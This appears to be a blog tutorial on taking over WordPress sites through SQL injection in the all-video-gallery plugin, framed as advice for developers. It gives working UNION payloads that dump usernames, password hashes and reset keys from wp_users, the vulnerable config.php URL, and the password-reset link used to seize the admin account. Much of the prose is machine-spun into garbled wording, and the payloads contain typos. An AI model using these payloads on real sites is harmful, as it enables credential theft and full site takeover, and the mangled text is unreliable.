How to Hack WordPress Site Using SQL Injection

1
632

How to Hack WordPress Site Using SQL Injection

HACK WORDPRESS SITE USING SQL INJECTION: First of all, my expectation isn’t to show to teach how to hack WordPress sites of others and destroy others hard work. This is a guide for WordPress Developers, who is an amateur in coding or doesn’t know about the vulnerabilities that may be available in modules they’re utilizing so they can avoid coding mistakes. Hack WordPress site method divided into three steps first, second, third.

STEP 1 – Find out Vulnerabilities in WordPress Website – Hack WordPress site

In the event that your site has been hacked or you need to ensure nobody can hack this, you should investigate plugins files and their coding. Maybe someplace Hacker is utilizing SQL queries without consciousness of SQL Injection approach to Hack WordPress site. On the off chance that this is someplace, the programmer will utilize union inquiry and can get all of you database lines from the wp_users table and beneath is an illustration question to bring all WordPress clients utilizing a union inquiry to know email locations of all clients.

-1 union Select 1,2,3,4,5,6,group_concat(user_login,----,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users

What precisely programmer doing is here to know the email of the administrator, for this, he is utilizing a union question.

A few months ago, Plugin all-video-gallery had a Vulnerabilities in config.php because of following code.

"SELECT * FROM ".$wpdb->prefix."allvideogallery_profiles WHERE id=".$_pid

In this query, Plugin developer was using the $_pid variable directly in a query without any typecasting.

$_pid=$_GET['pid']

So a hacker could pass this union query using PID attribute parameter in URL like this.

So a hacker could pass this union query using PID attribute parameter in URL like this.

http://{Domain_Name_Here}/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid={union Query here}

if you append that union query in this query it’s become as below.

"SELECT * FROM ".$wpdb->;prefix."allvideogallery_profiles WHERE id=-1 union Select 1,2,3,4,5,6,group_concat(user_login,0xa,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users

This file output is an XML file

HACK WORDPRESS SITE USING SQL INJECTION

STEP 2 – Reset WordPress Password and Get Activation Key – Hack WordPress site

Presently they’ll attempt to reset your secret key utilizing Admin’s email. For this, they’ll go to login page and will tap on Lost Your Password interface. On this time, another actuation code will be messaged to Admin’s email and the programmer will get this enactment code utilizing the accompanying query.

-1 union Select 1,2,3,4,5,6,group_concat(user_login,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users

Again, They will pass this union query as the previous step.

This file output is an XML file as below

HACK WORDPRESS SITE
After reset wordpress password and get activation key

STEP 3 – Use Activation key and Reset Password – Hack WordPress site

This one is the last step where he’ll actually reset your password and will get full control on your WordPress website.

In this progression, He’ll utilize enactment key to reset watchword and will take after this connection HTTP://{DOMAIN_NAME_HERE}/wp-login.php?action=rp&key={ACTIVATION_KEY_HERE}&login={USERNAME_HERE}

Finally, So a programmer might get to your WordPress site and can have full control on your site. Typically they embed vindictive code on your files or alter a plugins record to wind up plainly that as a WordPress indirect access to hack your site once more.

Also, read How to Hack WordPress Site using WP scan

1 COMMENT

LEAVE A REPLY

Please enter your comment!
Please enter your name here